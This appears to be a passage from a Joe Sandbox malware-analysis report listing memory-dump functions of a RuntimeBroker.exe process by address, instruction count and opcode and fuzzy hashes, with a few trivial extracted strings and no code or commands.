Memory Dump Source

Source File: 0000002C.00000002.2533805014.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_7ff848e80000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction ID: 290d4972ad82d1bd7a4e6530cf5a06ac43456d44fc8a9f41a4f6b4b1606cbbf4
Opcode Fuzzy Hash: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction Fuzzy Hash: ECC08C00D0F91F08E440716E14020ACA2007FC42A0FE10032C01C42091DE7D20C6126E

Function 00007FF848E81310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002C.00000002.2533805014.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_7ff848e80000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction ID: a68b7dab3807bbafa3e2affb65e23442acee59da3870891e66c8500f2ae23a87
Opcode Fuzzy Hash: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction Fuzzy Hash: 7BC04C345558098FC948FB29C88991877A0FF59215BD51090E409C7171E669DCD5D745

Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002C.00000002.2533805014.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_7ff848e80000_fdsN8iw6WG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction ID: 96063e164c094c18a03444ecc5be57ba15123a5c93d8a5564aba012e595fc386
Opcode Fuzzy Hash: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction Fuzzy Hash: 7BB01200C5E40F04E40431BA08420AC70407FC4140FC10070D40C41081D9AD1095035A

Analysis Process: RuntimeBroker.exePID: 6536, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E707B6 Relevance: 1.6, Instructions: 1608COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b6ddb325f18cf35d668278c9690d3653ea5490dbdebd4956302bbe688f35d1
Instruction ID: 9e1f7b0c1124c3b0e60893cb446ffe51d8b4a608d17c1c09a7b039050db826b5
Opcode Fuzzy Hash: f9b6ddb325f18cf35d668278c9690d3653ea5490dbdebd4956302bbe688f35d1
Instruction Fuzzy Hash: 4EB28131E1C95A9FEB98FA2884556B973A2FF94780F5441B9D00DD32C6DF38BC828785

Function 00007FF848E713EA Relevance: 1.0, Instructions: 1026COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6d1dd7eb58d6c10c9452c3b78870fef3cfaa6dde3f73e449a5e5d30adc2fd1
Instruction ID: bcebd8d1df5c20fe9de84f7f69a01b7021e7e7693ec9eeba1a81def400aa33e3
Opcode Fuzzy Hash: da6d1dd7eb58d6c10c9452c3b78870fef3cfaa6dde3f73e449a5e5d30adc2fd1
Instruction Fuzzy Hash: 23729131E1CA5A9FEB98FA2884556B873A1FF54780F5445B9D00DD32C7DF38AC828B85

Function 00007FF848E90D65 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb83c810b0fa07ca0a38bc3a5fda224a871a009074069ebe57dd446340fefd0c
Instruction ID: 2bbff616a2aa0434fba9eb83248a515779327ed72ea17f6e63d97df80b3b0a59
Opcode Fuzzy Hash: cb83c810b0fa07ca0a38bc3a5fda224a871a009074069ebe57dd446340fefd0c
Instruction Fuzzy Hash: 65D19A3182D79A0FE32D69694C420B47781FB43609F29537DCDEB831C7EA79A81782C9

Function 00007FF848E60D70 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d67f9c808e2ac886af97d40c602e97337b1cd416305a7c9bfdf4d391bc607e7
Instruction ID: c550078572294c1d7d17b24d0d51218c358c809dc3a002804372af814c0834df
Opcode Fuzzy Hash: 5d67f9c808e2ac886af97d40c602e97337b1cd416305a7c9bfdf4d391bc607e7
Instruction Fuzzy Hash: DD91D375D1CA998FDB49EB2C88593A97FE0FF96350F4400BEC00AE7296DB781405CB11

Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FF848E60B56
!k9, xrefs: 00007FF848E60B4E
"s9, xrefs: 00007FF848E60B46

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction ID: 5d5258ba7701fd2bc5c57b48a8010d4227e8934212b8484c97507578413e1ce6
Opcode Fuzzy Hash: 31d0b06b4d1969b856a058ac3edd199d739a0cd5d76fe7e3691b118520364b0c
Instruction Fuzzy Hash: 2C01F72A32D9568FC602B63EA4505D87B50EAC2135BC901F7D144CB191E3105C9EC3E0

Function 00007FF848E60940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

hN_H, xrefs: 00007FF848E6BC6E

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: hN_H
API String ID: 0-3774228483
Opcode ID: 57f2e16e7d99887a34380c716941d05e01ef459536d07a7cf7fde7866a711ca0
Instruction ID: 72a0235ba8a9d83c0ea852944e93aca257da07fd754a61431be5c2b05e906957
Opcode Fuzzy Hash: 57f2e16e7d99887a34380c716941d05e01ef459536d07a7cf7fde7866a711ca0
Instruction Fuzzy Hash: 7E512331A0CB049FE758EA1CE88A67577E1FBD9720F54057EE489C3296DE34BC028786

Function 00007FF848E92C29 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E92C46

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 19ef84477516da183b382c6db742e250c6067b5c63a0a3da0a68b7bb205444bd
Instruction ID: dcfaf31aee529611dedbce2fd783003ae70e8b70c7291cc0000f114b719ef780
Opcode Fuzzy Hash: 19ef84477516da183b382c6db742e250c6067b5c63a0a3da0a68b7bb205444bd
Instruction Fuzzy Hash: 90F0927190E7C44FCB1AEA7588694547FA0EF6721174A46EFC446CF2A7EA2DCC89CB01

Function 00007FF848E9A5A9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E9A5C6

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 479c78a0c65537fb5f3d72a4385fde152e36648f511b210aaaadcce97306e090
Instruction ID: 9c358dfa4d1d491dee8d4165978d7875f8c8a273d655f024df0565f867a0bfc8
Opcode Fuzzy Hash: 479c78a0c65537fb5f3d72a4385fde152e36648f511b210aaaadcce97306e090
Instruction Fuzzy Hash: B1F06D71A0E7C44FC71AAA3888694547FA0EF6721174A52EFC446CF1A7EA2DCC89C751

Function 00007FF848E9A639 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E9A656

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7e1c755700f63e59db1c504017b9fac4cb85fc3fcb323d03018910557950d7a8
Instruction ID: 8c949b47755514d4d5e2e475ca242acd8e7f72203bd880aa08e1c29274839f22
Opcode Fuzzy Hash: 7e1c755700f63e59db1c504017b9fac4cb85fc3fcb323d03018910557950d7a8
Instruction Fuzzy Hash: C6E06D71A0E7844FC71AAA3888694547FA0EF6721174A42EEC446CB2A7EA2D8885CB41

Function 00007FF848E919B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E919D6

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3bfa71d24d82ab8dce55f299f9d4e8df319258e77f82a28418c6e36b1083192c
Instruction ID: 104c7bdf4e7c45c9266cd8431a48474802738d0a89d3345d69840e7ef7d4d3d0
Opcode Fuzzy Hash: 3bfa71d24d82ab8dce55f299f9d4e8df319258e77f82a28418c6e36b1083192c
Instruction Fuzzy Hash: 51E0927190E7C04FCB16EA348868454BFA0EF67201B4A55EFC086CF1E7EA2DC889C701

Function 00007FF848E90699 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E906B6

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: b265fc27727bd6c79ff523c551d1e8a28cd2015113abe3f5e29df7bce4e17669
Instruction ID: 90ce6dd7d4895eb503bc7d05028c7d3953d136ad3f7c25cea4f0f63a3e82a881
Opcode Fuzzy Hash: b265fc27727bd6c79ff523c551d1e8a28cd2015113abe3f5e29df7bce4e17669
Instruction Fuzzy Hash: AEE0657160E7C04FC716EA7448694547FA0EF67211B4941EEC086CF5A7DB2D8845C701

Function 00007FF848E739E9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848E73A06

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 56afce2ecdd42088a4f63f25c5d82c1b2f368570ecf6339ca7b23f668f50f047
Instruction ID: 92675cae98e9e869ebd964e16f0802da4ac2817399165b973a4ea4cc5c7d4c98
Opcode Fuzzy Hash: 56afce2ecdd42088a4f63f25c5d82c1b2f368570ecf6339ca7b23f668f50f047
Instruction Fuzzy Hash: B4E0127154E7D44FC746EB3488698543F60EE6721178A41EEC145CF1B3E62DC845C701

Function 00007FF848E91A49 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848E91A66

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: fda4feaf7928ff362c66ea154e2ed37f0626fc2c371272e580a6763f285efe43
Instruction ID: 0014c3b093cf9439baec62f07592867f943d13cc25ae5ec2c9e2fa44d7fd4356
Opcode Fuzzy Hash: fda4feaf7928ff362c66ea154e2ed37f0626fc2c371272e580a6763f285efe43
Instruction Fuzzy Hash: 0FE0E57194E7C48FCB0AAB7488699593FA0AE67251B8A41EEC545CB1B3E62D8849C701

Function 00007FF848E9AB79 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848E9AB96

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 9ccee095aa2d531cf1df0f89fb55f479d3f8e187d1fc0150be5694a79f8f7082
Instruction ID: a84697fc3459fdaf8c85a480f7e7aa5b47a9cef85d5e9efded352b0ab6772e67
Opcode Fuzzy Hash: 9ccee095aa2d531cf1df0f89fb55f479d3f8e187d1fc0150be5694a79f8f7082
Instruction Fuzzy Hash: 2DE0127184E7D44FC716EB7888698543F60EE6721174B41DEC145CF1B7E62D8849C701

Function 00007FF848E98279 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848E98296

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 51587893f695f762595c42fae06de0c8715d9b14fd2659edefac87c9bfe46b89
Instruction ID: 8e3d86aa2905f7d98ac69fe82830b44c5676d463c6f775e6dbe082df0bdef876
Opcode Fuzzy Hash: 51587893f695f762595c42fae06de0c8715d9b14fd2659edefac87c9bfe46b89
Instruction Fuzzy Hash: 89E01A6184E7C44FCB46EB74886A8587FA0AE67211B8A40EEC045CF5B3E62D8849C701

Function 00007FF848E92CB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848E92CD6

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 20252c3c1b3287bebe877aa7d97384d69885141b16b465670d95bbc31751528f
Instruction ID: ecd9184fe903a8171bd9744aec1623ec1d92a9c026a25dbbea6a770927583094
Opcode Fuzzy Hash: 20252c3c1b3287bebe877aa7d97384d69885141b16b465670d95bbc31751528f
Instruction Fuzzy Hash: A1E01A7294E7C04FCB06EB7488B98447FA0AF67210B8A40EEC046CF1B7E62D8849C711

Function 00007FF848E70DCD Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f159bffa7986a4fc4fbe2bdb882a8ad4f4bc2dafc7ca71684fd91554a86bc52d
Instruction ID: c2b2edf3243500f357bf527ef83f358a07e5c6c91e8ad4d280d0f8189f931d04
Opcode Fuzzy Hash: f159bffa7986a4fc4fbe2bdb882a8ad4f4bc2dafc7ca71684fd91554a86bc52d
Instruction Fuzzy Hash: 32326F31E1C95A8FEB98FA2884556B973A2FF94780F5441B9D00DD32C6DF39BC828785

Function 00007FF848E930F5 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a357c2ac6c20f0ff11495e2bd29d80b686ff4ffa04043d23abc90c11c7fe4121
Instruction ID: a33f487fa8261597ac7b4805481ce2dd3feaea346a64806f07112e32aef3bdf1
Opcode Fuzzy Hash: a357c2ac6c20f0ff11495e2bd29d80b686ff4ffa04043d23abc90c11c7fe4121
Instruction Fuzzy Hash: 5C91D221E1CD8A5FEB88FA6C84562B973D2FF54789F0841BAD40EC3297DE7C68418385

Function 00007FF848E9AD8C Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d646c524be6303ff8694c4ae8a9a4468bd1ed85777ee223da73d1a7e2837d17
Instruction ID: 00d89df90f0e9f4283bf65e85ca41e8f9cba203b9982625d170458c9976b5f94
Opcode Fuzzy Hash: 9d646c524be6303ff8694c4ae8a9a4468bd1ed85777ee223da73d1a7e2837d17
Instruction Fuzzy Hash: 5531D321E1DD4A4FEA85F6AC94996BD77D1FF58B88F1440B5D00DC3286DE7C6C818345

Function 00007FF848E92081 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bada0a43ad967aba4c696bd449fcd094dcafe24fab7835d12e698fab349a41
Instruction ID: b0a7877a4e85f140e554b28c51674d54cf8a6ef151e17cc9cff9d9d1fe94fdcd
Opcode Fuzzy Hash: 04bada0a43ad967aba4c696bd449fcd094dcafe24fab7835d12e698fab349a41
Instruction Fuzzy Hash: D8310231E0C99A8FEB68FA5888547B977A1FB85354F04017AC419D72C6DFB85C45C781

Function 00007FF848E60908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction ID: ae9473942b9f4cd99d7bab87696a697ebdd573ff0ba58788f745b26d878f8d46
Opcode Fuzzy Hash: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction Fuzzy Hash: 0B21D83170CC184FD768EA1CE889DB973D1FB9932170501BAE58AC7126D921EC8287C5

Function 00007FF848E6472C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction ID: 6c67a0f0cab8b733eee3973299b77352ee58d50c67870521ed4c191aa22857dd
Opcode Fuzzy Hash: f1efd2528d02ee32652b2bdd72d0fb1b7ab4c31dee9d705dd4b398b5938d65e9
Instruction Fuzzy Hash: 91315E20D1C51A4EEBA4F65894567B872D1FF59394F9001BAE80EF3292EF3878844A4A

Function 00007FF848E60998 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a510828bfd93368a72d184446c8f63ce803b2edc6745f236a06bf88df04d963c
Instruction ID: c876daf00d352c6e335673e23e1d998411d911ef23993f71565dc65ffd990396
Opcode Fuzzy Hash: a510828bfd93368a72d184446c8f63ce803b2edc6745f236a06bf88df04d963c
Instruction Fuzzy Hash: 5921F820B1C9191FE788F62C945E67976C2FF99391F5440B9E80EC32D7DE28BC818788

Function 00007FF848E96ED8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd85a96b966bb3f550b1ee9f629571e6d48714d8e72b7073485c9cd489efa31
Instruction ID: 9150502c2c2846623b94c3205f80eff23329372c8b4c6700b8e22839b94fdf61
Opcode Fuzzy Hash: 0dd85a96b966bb3f550b1ee9f629571e6d48714d8e72b7073485c9cd489efa31
Instruction Fuzzy Hash: 0421A4D698E9523DE60D767CF8521F93B90EF422BDF0C91B3E18C89093DE18548986AD

Function 00007FF848E611A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a0d5ecee174c738b50a88a0b7d88dfe89c22eac7e3d86f82562e4b808149a4
Instruction ID: ee2af6bbbf42648768c02497ca3a879b35e323a3c1b677ad4a445a6122ee2b41
Opcode Fuzzy Hash: f4a0d5ecee174c738b50a88a0b7d88dfe89c22eac7e3d86f82562e4b808149a4
Instruction Fuzzy Hash: 4B316F3090D69A8FDB46FB28C8589B97BF0FF56340F4805BAC009E72A2DB39A940C751

Function 00007FF848E74369 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75bcaeaef63ec76dea02780878310005041480f9bd591dfbbc04dc48c7e7320e
Instruction ID: e2038d1a77d9c69f351db84fbbcf00f9a7ebdb12afa160f81a00643263566289
Opcode Fuzzy Hash: 75bcaeaef63ec76dea02780878310005041480f9bd591dfbbc04dc48c7e7320e
Instruction Fuzzy Hash: A6210231E0C6894FE752BA2848441B87BA0FF92354F5902F7C04CC70D2EE3C69468385

Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97f0c71eb41460f47986ba53585fb5b9aa82a7fff37d60895c0ba9639e59694
Instruction ID: 3531f2214c00c943960c64cc379c3facc58a5987682d65ac9c2ac4beb984d3a4
Opcode Fuzzy Hash: e97f0c71eb41460f47986ba53585fb5b9aa82a7fff37d60895c0ba9639e59694
Instruction Fuzzy Hash: 4B21D33590D69A9FE712FB28C8452EC7FA0FF423A4F5445B6C044FB1C2DB3829898755

Function 00007FF848E608F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e60000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction ID: ad54f8b196b71538dcd1682855679afe4567056aebd3c88d2da7cf4811f98e8f
Opcode Fuzzy Hash: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction Fuzzy Hash: 4C014C31B0D92C1FD658E01D540A93573C2E7CA6B0B951239D84FD3245CD61FC0342C4

Function 00007FF848E756FD Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3272aba964bf720f88c3cee06fa60d9e77996c9598086a52eebc5bda0cef683
Instruction ID: 6a737583308b4ef8cf5dfc0837b4d08a79d883053531b0a9d461ed317e8bd541
Opcode Fuzzy Hash: f3272aba964bf720f88c3cee06fa60d9e77996c9598086a52eebc5bda0cef683
Instruction Fuzzy Hash: 3601D831B18A494FC74CB63CD8554B477D0FF96216B8842BAD04AC7192EE2AEC8AC785

Function 00007FF848E96F38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee7c12b2deae948f481afbe704f6d798c733bce82c6c2380223bc261084296c
Instruction ID: 01cc3a41cb845cd75e78b513d7f02ab04f7bd8b5a325216f3308bf8f438dd517
Opcode Fuzzy Hash: 1ee7c12b2deae948f481afbe704f6d798c733bce82c6c2380223bc261084296c
Instruction Fuzzy Hash: 8401F796A8E9513DE70D767CB8550F93B90EF022BDF0C91B3E08C8D093DE1C948986AC

Function 00007FF848E9D7C3 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e90000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d14b3652b8f5440a0a6341c47fcc5bad9f161d62db799fc19f1f47f34a63ee
Instruction ID: 762320c3024a8030ec53763a32da0a5372b98b2125e19ac985ba2ef9ee599b41
Opcode Fuzzy Hash: 26d14b3652b8f5440a0a6341c47fcc5bad9f161d62db799fc19f1f47f34a63ee
Instruction Fuzzy Hash: 34015E32F0C4298EEB60F999E8853FC73E2FB84794F590072C40DA7186DB7998868794

Function 00007FF848E74058 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.2551344313.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff848e70000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7f85e9d82cce3c5e2a9a12e0150efd50b964ed16c121940b8285242d3aa73d
